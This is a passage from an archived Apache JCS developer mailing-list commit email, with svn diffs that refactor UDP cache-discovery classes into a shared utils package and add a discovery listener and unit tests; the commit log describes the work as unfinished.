service.addOrUpdateService( discoveredService ); + + // DO WORK + service.removeDiscoveredService( discoveredService ); + + // VERIFY + assertFalse( "Service should not be in the service list.", service.getDiscoveredServices() + .contains( discoveredService ) ); + assertFalse( "Service should not be in the listener list.", discoveryListener.discoveredServices + .contains( discoveredService ) ); + } +} Copied: jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryUnitTest.java (from r781592, jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryUnitTest.java) URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryUnitTest.java?p2=jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryUnitTest.java&p1=jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryUnitTest.java&r1=781592&r2=794825&rev=794825&view=diff ============================================================================== --- jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryUnitTest.java (original) +++ jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryUnitTest.java Thu Jul 16 20:14:42 2009 @@ -1,4 +1,4 @@ -package org.apache.jcs.auxiliary.lateral.socket.tcp.discovery; +package org.apache.jcs.utils.discovery; /* * Licensed to the Apache Software Foundation (ASF) under one @@ -23,17 +23,8 @@ import junit.framework.TestCase; -import org.apache.jcs.JCS; import org.apache.jcs.auxiliary.MockCacheEventLogger; -import org.apache.jcs.auxiliary.lateral.LateralCache; -import org.apache.jcs.auxiliary.lateral.LateralCacheAttributes; -import org.apache.jcs.auxiliary.lateral.LateralCacheNoWait; -import org.apache.jcs.auxiliary.lateral.LateralCacheNoWaitFacade; -import org.apache.jcs.auxiliary.lateral.behavior.ILateralCacheAttributes; -import org.apache.jcs.auxiliary.lateral.socket.tcp.TCPLateralCacheAttributes; -import org.apache.jcs.engine.behavior.ICompositeCacheManager; -import org.apache.jcs.engine.control.CompositeCacheManager; -import org.apache.jcs.utils.serialization.StandardSerializer; +import org.apache.jcs.utils.timing.SleepUtil; /** * Unit tests for discovery @@ -42,71 +33,33 @@ extends TestCase { /** - * Test setup - */ - public void setUp() - { - JCS.setConfigFilename( "/TestUDPDiscovery.ccf" ); - } - - /** - * 1. create the attributes for the service - * <p> - * 2. create the service - * <p> - * 3. create a no wait facade for the service - * <p> - * 4. add the facade to the service under the name testCache1 - * <p> - * 5. create a receiver with the service - * <p> - * 6. create a sender * <p> - * 7.create more names than we have no wait facades for the only one that gets added should be - * testCache1 - * <p> - * 8. send 10 messages - * <p> - * 9. check to see that we got 10 messages - * <p> - * 10. check to see if the testCache1 facade got a nowait. * @throws Exception */ public void testSimpleUDPDiscovery() throws Exception { - // create the attributes for the service - TCPLateralCacheAttributes lac = new TCPLateralCacheAttributes(); - lac.setTransmissionType( LateralCacheAttributes.TCP ); - lac.setTcpServer( "localhost" + ":" + 1111 ); - - ICompositeCacheManager cacheMgr = CompositeCacheManager.getInstance(); + UDPDiscoveryAttributes attributes = new UDPDiscoveryAttributes(); + attributes.setUdpDiscoveryAddr( "161.129.204.104" ); + attributes.setUdpDiscoveryPort( 6789 ); + attributes.setServicePort( 1000 ); // create the service - UDPDiscoveryService service = new UDPDiscoveryService( lac.getUdpDiscoveryAddr(), lac.getUdpDiscoveryPort(), - lac.getTcpListenerPort(), cacheMgr, - new MockCacheEventLogger(), new StandardSerializer() ); - service.setTcpLateralCacheAttributes( lac ); - - // create a no wait facade for the service - ArrayList noWaits = new ArrayList(); - ILateralCacheAttributes attr = new LateralCacheAttributes(); - attr.setCacheName( "testCache1" ); - - LateralCacheNoWaitFacade lcnwf = new LateralCacheNoWaitFacade( (LateralCacheNoWait[]) noWaits - .toArray( new LateralCacheNoWait[0] ), attr ); + UDPDiscoveryService service = new UDPDiscoveryService( attributes, new MockCacheEventLogger() ); + service.addParticipatingCacheName( "testCache1" ); - // add the facade to the service under the name testCache1 - service.addNoWaitFacade( lcnwf, "testCache1" ); + MockDiscoveryListener discoveryListener = new MockDiscoveryListener(); + service.setDiscoveryListener( discoveryListener ); // create a receiver with the service - UDPDiscoveryReceiver receiver = new UDPDiscoveryReceiver( service, "161.129.204.104", 6789, cacheMgr, - new MockCacheEventLogger(), new StandardSerializer() ); + UDPDiscoveryReceiver receiver = new UDPDiscoveryReceiver( service, attributes.getUdpDiscoveryAddr(), attributes + .getUdpDiscoveryPort() ); Thread t = new Thread( receiver ); t.start(); // create a sender - UDPDiscoverySender sender = new UDPDiscoverySender( "161.129.204.104", 6789 ); + UDPDiscoverySender sender = new UDPDiscoverySender( attributes.getUdpDiscoveryAddr(), attributes + .getUdpDiscoveryPort() ); // create more names than we have no wait facades for // the only one that gets added should be testCache1 @@ -124,80 +77,16 @@ for ( ; cnt < max; cnt++ ) { sender.passiveBroadcast( "localhost", 1111, cacheNames, 1 ); - Thread.sleep( 3 ); + SleepUtil.sleepAtLeast( 20 ); } + SleepUtil.sleepAtLeast( 200 ); + // check to see that we got 10 messages - System.out.println( "Receiver count = " + receiver.getCnt() ); - //assertEquals( "Receiver count should be the same as the number - // sent.", cnt, receiver.getCnt() ); + //System.out.println( "Receiver count = " + receiver.getCnt() ); // request braodcasts change things. - assertTrue( "Receiver count should be the at least the number sent.", cnt <= receiver.getCnt() ); - - Thread.sleep( 2000 ); - - // check to see if the testCache1 facade got a nowait. - assertEquals( "Should have 1", 1, lcnwf.noWaits.length ); - - //ArrayList cacheNames2 = new ArrayList(); - //cacheNames2.add( "testCache1" ); - // add another - //sender.passiveBroadcast( "localhost", 11112, cacheNames2, 1 ); - //Thread.sleep( 30 ); - //assertEquals( "Should have 2", 2, lcnwf.noWaits.length ); - - } - - /** - * Verify that the config does not throw any errors. - * @throws Exception - */ - public void testUDPDiscoveryConfig() - throws Exception - { - JCS jcs = JCS.getInstance( "testCache1" ); - - System.out.println( jcs.getStats() ); - - JCS jcs2 = JCS.getInstance( "testCache2" ); - - System.out.println( jcs2.getStats() ); - - } - - /** - * Make sure the no wait facade doesn't add dupes. - * <p> - * @throws Exception - */ - public void testNoWaitFacadeAdd() - throws Exception - { - ArrayList noWaits = new ArrayList(); - ILateralCacheAttributes attr = new LateralCacheAttributes(); - attr.setCacheName( "testCache1" ); - LateralCacheNoWaitFacade lcnwf = new LateralCacheNoWaitFacade( (LateralCacheNoWait[]) noWaits - .toArray( new LateralCacheNoWait[0] ), attr ); - - TCPLateralCacheAttributes lac = new TCPLateralCacheAttributes(); - lac.setTransmissionType( LateralCacheAttributes.TCP ); - lac.setTcpServer( "localhost" + ":" + 1111 ); - - LateralCache cache = new MockLateralCache( lac ); - - // add one - LateralCacheNoWait noWait = new LateralCacheNoWait( cache ); - lcnwf.addNoWait( noWait ); - assertEquals( "Facade should have 1 no wait", 1, lcnwf.noWaits.length ); - - // add another - LateralCacheNoWait noWait2 = new LateralCacheNoWait( cache ); - lcnwf.addNoWait( noWait2 ); - assertEquals( "Facade should have 2 no waits", 2, lcnwf.noWaits.length ); - - // try adding the same one again - lcnwf.addNoWait( noWait2 ); - assertEquals( "Facade should still have 2 no waits", 2, lcnwf.noWaits.length ); + assertTrue( "Receiver count [" + receiver.getCnt() + "] should be the at least the number sent [" + cnt + "].", + cnt <= receiver.getCnt() ); } } Propchange: jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryUnitTest.java ------------------------------------------------------------------------------ cvs2svn:cvs-rev = 1.1 Propchange: jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryUnitTest.java ------------------------------------------------------------------------------ svn:eol-style = native Propchange: jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryUnitTest.java ------------------------------------------------------------------------------ svn:keywords = Author Date Id Revision Propchange: jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryUnitTest.java ------------------------------------------------------------------------------ svn:mergeinfo = --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 16 20:14:20 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40012 invoked from network); 16 Jul 2009 20:14:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 16 Jul 2009 20:14:19 -0000 Received: (qmail 26745 invoked by uid 500); 16 Jul 2009 20:15:22 -0000 Delivered-To: [email protected] Received: (qmail 26609 invoked by uid 500); 16 Jul 2009 20:15:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 26495 invoked by uid 500); 16 Jul 2009 20:15:22 -0000 Delivered-To: [email protected] Received: (qmail 26488 invoked by uid 500); 16 Jul 2009 20:15:22 -0000 Delivered-To: [email protected] Received: (qmail 26449 invoked by uid 99); 16 Jul 2009 20:15:19 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 20:15:19 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 16 Jul 2009 20:15:05 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 4527623889CB; Thu, 16 Jul 2009 20:14:44 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r794825 [1/2] - in /jakarta/jcs/trunk/src: java/org/apache/jcs/auxiliary/lateral/ java/org/apache/jcs/auxiliary/lateral/socket/tcp/ java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/ java/org/apache/jcs/auxiliary/lateral/socket/tcp... Date: Thu, 16 Jul 2009 20:14:43 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: asmuts Date: Thu Jul 16 20:14:42 2009 New Revision: 794825 URL: http://svn.apache.org/viewvc?rev=794825&view=rev Log: Moving UDP discovery out of the tcp lateral package. This isn't finished yet. I'm trying to make it usable by other auxiliaries. Added: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/behavior/ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveredService.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveryShutdownHook.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPCleanupRunner.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryAttributes.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryInfo.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryManager.java (contents, props changed) - copied, changed from r781592, jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryManager.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryMessage.java (contents, props changed) - copied, changed from r781592, jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryMessage.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryReceiver.java (contents, props changed) - copied, changed from r792552, jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryReceiver.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySender.java (contents, props changed) - copied, changed from r781592, jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoverySender.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoverySenderThread.java (contents, props changed) - copied, changed from r781592, jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoverySenderThread.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/UDPDiscoveryService.java (contents, props changed) - copied, changed from r781592, jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryService.java jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/behavior/ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/behavior/IDiscoveryListener.java jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/MockLateralCache.java (contents, props changed) - copied, changed from r781592, jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/MockLateralCache.java jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/ jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/MockDiscoveryListener.java jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoverySenderUnitTest.java jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryServiceUnitTest.java jakarta/jcs/trunk/src/test/org/apache/jcs/utils/discovery/UDPDiscoveryUnitTest.java (contents, props changed) - copied, changed from r781592, jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryUnitTest.java Removed: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryManager.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryMessage.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryReceiver.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoverySender.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoverySenderThread.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryService.java jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/MockLateralCache.java jakarta/jcs/trunk/src/test/org/apache/jcs/auxiliary/lateral/socket/tcp/discovery/UDPDiscoveryUnitTest.java Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWaitFacade.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheFactory.java jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPSender.java jakarta/jcs/trunk/src/test-conf/log4j.properties Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWaitFacade.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWaitFacade.java?rev=794825&r1=794824&r2=794825&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWaitFacade.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/LateralCacheNoWaitFacade.java Thu Jul 16 20:14:42 2009 @@ -90,7 +90,7 @@ * @param noWait * @return true if it wasn't alreay contained */ - public boolean addNoWait( LateralCacheNoWait noWait ) + public synchronized boolean addNoWait( LateralCacheNoWait noWait ) { if ( noWait == null ) { @@ -120,9 +120,50 @@ noWaits = newArray; return true; + } + /** + * Removes a no wait from the list if it is already there. + * <p> + * @param noWait + * @return true if it was already in the array + */ + public synchronized boolean removeNoWait( LateralCacheNoWait noWait ) + { + if ( noWait == null ) + { + return false; + } + + int position = -1; + for ( int i = 0; i < noWaits.length; i++ ) + { + // we know noWait isn't null + if ( noWait.equals( noWaits[i] ) ) + { + position = i; + } + } + + if ( position == -1 ) + { + return false; + } + + LateralCacheNoWait[] newArray = new LateralCacheNoWait[noWaits.length -1]; + + if ( position > 0 ) + { + System.arraycopy( noWaits, 0, newArray, 0, position -1 ); + } + System.arraycopy( noWaits, position +1, newArray, 0, noWaits.length ); + + noWaits = newArray; + + return true; } + /** * @param ce * @throws IOException Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheFactory.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheFactory.java?rev=794825&r1=794824&r2=794825&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheFactory.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPCacheFactory.java Thu Jul 16 20:14:42 2009 @@ -31,12 +31,12 @@ import org.apache.jcs.auxiliary.lateral.LateralCacheNoWaitFacade; import org.apache.jcs.auxiliary.lateral.behavior.ILateralCacheAttributes; import org.apache.jcs.auxiliary.lateral.socket.tcp.behavior.ITCPLateralCacheAttributes; -import org.apache.jcs.auxiliary.lateral.socket.tcp.discovery.UDPDiscoveryManager; -import org.apache.jcs.auxiliary.lateral.socket.tcp.discovery.UDPDiscoveryService; import org.apache.jcs.engine.behavior.ICache; import org.apache.jcs.engine.behavior.ICompositeCacheManager; import org.apache.jcs.engine.behavior.IElementSerializer; import org.apache.jcs.engine.logging.behavior.ICacheEventLogger; +import org.apache.jcs.utils.discovery.UDPDiscoveryManager; +import org.apache.jcs.utils.discovery.UDPDiscoveryService; /** * Constructs a LateralCacheNoWaitFacade for the given configuration. Each lateral service / local @@ -154,8 +154,8 @@ * @param lac ITCPLateralCacheAttributes * @param lcnwf * @param cacheMgr - * @param cacheEventLogger - * @param elementSerializer + * @param cacheEventLogger + * @param elementSerializer * @return null if none is created. */ private UDPDiscoveryService createDiscoveryService( ITCPLateralCacheAttributes lac, LateralCacheNoWaitFacade lcnwf, @@ -168,13 +168,19 @@ // create the UDP discovery for the TCP lateral if ( lac.isUdpDiscoveryEnabled() ) { + LateralTCPDiscoveryListener discoveryListener = new LateralTCPDiscoveryListener( cacheMgr, cacheEventLogger, + elementSerializer ); + + discoveryListener.addNoWaitFacade( lcnwf, lac.getCacheName() ); + // need a factory for this so it doesn't // get dereferenced, also we don't want one for every region. - discovery = UDPDiscoveryManager.getInstance().getService( lac, cacheMgr, cacheEventLogger, + discovery = UDPDiscoveryManager.getInstance().getService( lac.getUdpDiscoveryAddr(), lac.getUdpDiscoveryPort(), lac.getTcpListenerPort(), cacheMgr, cacheEventLogger, elementSerializer ); - discovery.addNoWaitFacade( lcnwf, lac.getCacheName() ); - + discovery.addParticipatingCacheName( lac.getCacheName() ); + discovery.setDiscoveryListener( discoveryListener ); + if ( log.isInfoEnabled() ) { log.info( "Created UDPDiscoveryService for TCP lateral cache." ); Added: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java?rev=794825&view=auto ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java (added) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPDiscoveryListener.java Thu Jul 16 20:14:42 2009 @@ -0,0 +1,208 @@ +package org.apache.jcs.auxiliary.lateral.socket.tcp; + +import java.util.ArrayList; +import java.util.HashMap; +import java.util.Iterator; +import java.util.Map; + +import org.apache.commons.logging.Log; +import org.apache.commons.logging.LogFactory; +import org.apache.jcs.auxiliary.lateral.LateralCacheAttributes; +import org.apache.jcs.auxiliary.lateral.LateralCacheNoWait; +import org.apache.jcs.auxiliary.lateral.LateralCacheNoWaitFacade; +import org.apache.jcs.auxiliary.lateral.socket.tcp.behavior.ITCPLateralCacheAttributes; +import org.apache.jcs.engine.behavior.ICache; +import org.apache.jcs.engine.behavior.ICompositeCacheManager; +import org.apache.jcs.engine.behavior.IElementSerializer; +import org.apache.jcs.engine.logging.behavior.ICacheEventLogger; +import org.apache.jcs.utils.discovery.DiscoveredService; +import org.apache.jcs.utils.discovery.behavior.IDiscoveryListener; + +/** This knows how to add and remove discovered services. */ +public class LateralTCPDiscoveryListener + implements IDiscoveryListener +{ + /** The log factory */ + private final static Log log = LogFactory.getLog( LateralTCPDiscoveryListener.class ); + + /** + * Map of no wait facades. these are used to determine which regions are locally configured to + * use laterals. + */ + private Map facades = new HashMap(); + + /** The cache manager. */ + private ICompositeCacheManager cacheMgr; + + /** The event logger. */ + protected ICacheEventLogger cacheEventLogger; + + /** The serializer. */ + protected IElementSerializer elementSerializer; + + /** + * This plugs into the udp discovery system. It will receive add and remove events. + * <p> + * @param cacheMgr + * @param cacheEventLogger + * @param elementSerializer + */ + protected LateralTCPDiscoveryListener( ICompositeCacheManager cacheMgr, ICacheEventLogger cacheEventLogger, + IElementSerializer elementSerializer ) + { + this.cacheMgr = cacheMgr; + this.cacheEventLogger = cacheEventLogger; + this.elementSerializer = elementSerializer; + } + + /** + * Adds a nowait facade under this cachename. If one already existed, it will be overridden. + * <p> + * This adds nowaits to a facade for the region name. If the region has no facade, then it is + * not configured to use the lateral cache, and no facade will be created. + * <p> + * @param facade + * @param cacheName + * @return true if the facade was not already registered. + */ + public synchronized boolean addNoWaitFacade( LateralCacheNoWaitFacade facade, String cacheName ) + { + boolean isNew = !facades.containsKey( cacheName ); + + // override or put anew, it doesn't matter + facades.put( cacheName, facade ); + + return isNew; + } + + /** + * When a broadcast is received from the UDP Discovery receiver, for each cacheName in the + * message, the add no wait will be called here. To add a no wait, the facade is looked up for + * this cache name. + * <p> + * @param noWait + */ + protected void addNoWait( LateralCacheNoWait noWait ) + { + LateralCacheNoWaitFacade facade = (LateralCacheNoWaitFacade) facades.get( noWait.getCacheName() ); + if ( log.isDebugEnabled() ) + { + log.debug( "Got facade for " + noWait.getCacheName() + " = " + facade ); + } + + if ( facade != null ) + { + boolean isNew = facade.addNoWait( noWait ); + if ( log.isDebugEnabled() ) + { + log.debug( "Called addNoWait, isNew = " + isNew ); + } + } + else + { + if ( log.isInfoEnabled() ) + { + log.info( "Different nodes are configured differently. Region [" + noWait.getCacheName() + + "] is not configured to use the lateral cache." ); + } + } + } + + /** + * Look up the facade for the name. If it doesn't exist, then the region is not configured for + * use with the lateral cache. If it is present, remove the item from the no wait list. + * <p> + * @param noWait + */ + protected void removeNoWait( LateralCacheNoWait noWait ) + { + LateralCacheNoWaitFacade facade = (LateralCacheNoWaitFacade) facades.get( noWait.getCacheName() ); + if ( log.isDebugEnabled() ) + { + log.debug( "Got facade for " + noWait.getCacheName() + " = " + facade ); + } + + if ( facade != null ) + { + boolean isNew = facade.addNoWait( noWait ); + if ( log.isDebugEnabled() ) + { + log.debug( "Called addNoWait, isNew = " + isNew ); + } + } + else + { + if ( log.isInfoEnabled() ) + { + log.info( "Different nodes are configured differently. Region [" + noWait.getCacheName() + + "] is not configured to use the lateral cache." ); + } + } + } + + /** + * Creates the lateral cache if needed. + * <p> + * @param service + */ + public void addDiscoveredService( DiscoveredService service ) + { + // get a cache and add it to the no waits + // the add method should not add the same. + // we need the listener port from the original config. + ITCPLateralCacheAttributes lca = new TCPLateralCacheAttributes(); + lca.setTransmissionType( LateralCacheAttributes.TCP ); + lca.setTcpServer( service.getServiceAddress() + ":" + service.getServicePort() ); + LateralTCPCacheManager lcm = LateralTCPCacheManager.getInstance( lca, cacheMgr, cacheEventLogger, + elementSerializer ); + + ArrayList regions = service.getCacheNames(); + if ( regions != null ) + { + // for each region get the cache + Iterator it = regions.iterator(); + while ( it.hasNext() ) + { + String cacheName = (String) it.next(); + + try + { + ICache ic = lcm.getCache( cacheName ); + + if ( log.isDebugEnabled() ) + { + log.debug( "Got cache, ic = " + ic ); + } + + // add this to the nowaits for this cachename + if ( ic != null ) + { + addNoWait( (LateralCacheNoWait) ic ); + if ( log.isDebugEnabled() ) + { + log.debug( "Called addNoWait for cacheName " + cacheName ); + } + } + } + catch ( Exception e ) + { + log.error( "Problem creating no wait", e ); + } + } + // end while + } + else + { + log.warn( "No cache names found in message " + service ); + } + } + + /** + * Removes the lateral cache. + * @param service + */ + public void removeDiscoveredService( DiscoveredService service ) + { + // TODO Auto-generated method stub + } +} Modified: jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPSender.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPSender.java?rev=794825&r1=794824&r2=794825&view=diff ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPSender.java (original) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/auxiliary/lateral/socket/tcp/LateralTCPSender.java Thu Jul 16 20:14:42 2009 @@ -32,7 +32,7 @@ import org.apache.jcs.auxiliary.lateral.socket.tcp.utils.SocketOpener; /** - * This class is based on the log4j SocketAppender class. I'm using a differnet repair structure, so + * This class is based on the log4j SocketAppender class. I'm using a different repair structure, so * it is significantly different. */ public class LateralTCPSender @@ -66,7 +66,7 @@ // reset the ObjectOutputStream every 70 calls // private static final int RESET_FREQUENCY = 70; - // Perhaps we need to resett every time until we move to jdk 1.4 + // Perhaps we need to reset every time until we move to jdk 1.4 // then we can call writeUnshared to make sure // that the object definetely gets across and not // a stream cached version. @@ -270,7 +270,7 @@ // Synchronized to insure that the get requests to server from this // sender and the responses are processed in order, else you could // return the wrong item from the cache. - // This is a big block of code. May need to rethink this strategy. + // This is a big block of code. May need to re-think this strategy. // This may not be necessary. // Normal puts, etc to laterals do not have to be synchronized. synchronized ( this.getLock ) @@ -307,8 +307,7 @@ String message = "Could not open ObjectInputStream to " + socket; if ( socket != null ) { - message += " SoTimeout [" + socket.getSoTimeout() + "]"; - // this is 1.4 specific -- Connected [" + socket.isConnected() + "]"; + message += " SoTimeout [" + socket.getSoTimeout() + "] Connected [" + socket.isConnected() + "]"; } log.error( message, ioe ); throw ioe; @@ -322,8 +321,7 @@ { counter = 0; // Failing to reset the object output stream every now - // and - // then creates a serious memory leak. + // and then creates a serious memory leak. log.info( "Doing oos.reset()" ); oos.reset(); } Added: jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveredService.java URL: http://svn.apache.org/viewvc/jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveredService.java?rev=794825&view=auto ============================================================================== --- jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveredService.java (added) +++ jakarta/jcs/trunk/src/java/org/apache/jcs/utils/discovery/DiscoveredService.java Thu Jul 16 20:14:42 2009 @@ -0,0 +1,140 @@ +package org.apache.jcs.utils.discovery; + +import java.io.Serializable; +import java.util.ArrayList; + +import org.apache.commons.lang.builder.EqualsBuilder; +import org.apache.commons.lang.builder.HashCodeBuilder; + +/** + * This contains info about a discovered service. These objects are stored in a set in the + * UDPDiscoveryService. + * <p> + * @author Aaron Smuts + */ +public class DiscoveredService + implements Serializable +{ + /** For serialization. Don't change. */ + private static final long serialVersionUID = -7810164772089509751L; + + /** region names */ + private ArrayList cacheNames; + + /** service address */ + private String serviceAddress; + + /** service port */ + private int servicePort; + + /** last time we heard from this service? */ + private long lastHearFromTime = 0; + + /** + * @param cacheNames the cacheNames to set + */ + public void setCacheNames( ArrayList cacheNames ) + { + this.cacheNames = cacheNames; + } + + /** + * @return the cacheNames + */ + public ArrayList getCacheNames() + { + return cacheNames; + } + + /** + * @param serviceAddress The serviceAddress to set. + */ + public void setServiceAddress( String serviceAddress ) + { + this.serviceAddress = serviceAddress; + } + + /** + * @return Returns the serviceAddress. + */ + public String getServiceAddress() + { + return serviceAddress; + } + + /** + * @param servicePort The servicePort to set. + */ + public void setServicePort( int servicePort ) + { + this.servicePort = servicePort; + } + + /** + * @return Returns the servicePort. + */ + public int getServicePort() + { + return servicePort; + } + + /** + * @param lastHearFromTime The lastHearFromTime to set. + */ + public void setLastHearFromTime( long lastHearFromTime ) + { + this.lastHearFromTime = lastHearFromTime; + } + + /** + * @return Returns the lastHearFromTime. + */ + public long getLastHearFromTime() + { + return lastHearFromTime; + } + + /** @return hashcode based on address/port/name */ + public int hashCode() + { + HashCodeBuilder builder = new HashCodeBuilder(); + builder.append( this.getServiceAddress() ); + builder.append( this.getServicePort() ); + builder.append( this.getCacheNames() ); + return builder.toHashCode(); + } + + /** + * NOTE - this object is often put into sets, so equals needs to be overridden. + * <p> + * @param otherArg other + * @return equality based on the address/port/name + */ + public boolean equals( Object otherArg ) + { + if ( otherArg instanceof DiscoveredService ) + { + DiscoveredService other = (DiscoveredService) otherArg; + EqualsBuilder builder = new EqualsBuilder(); + builder.append( this.getServiceAddress(), other.getServiceAddress() ); + builder.append( this.getServicePort(), other.getServicePort() ); + builder.append( this.getCacheNames(), other.getCacheNames() ); + return builder.isEquals(); + } + return false; + } + + /** + * @return string for debugging purposes. + */ + public String toString() + { + StringBuffer buf = new StringBuffer(); + 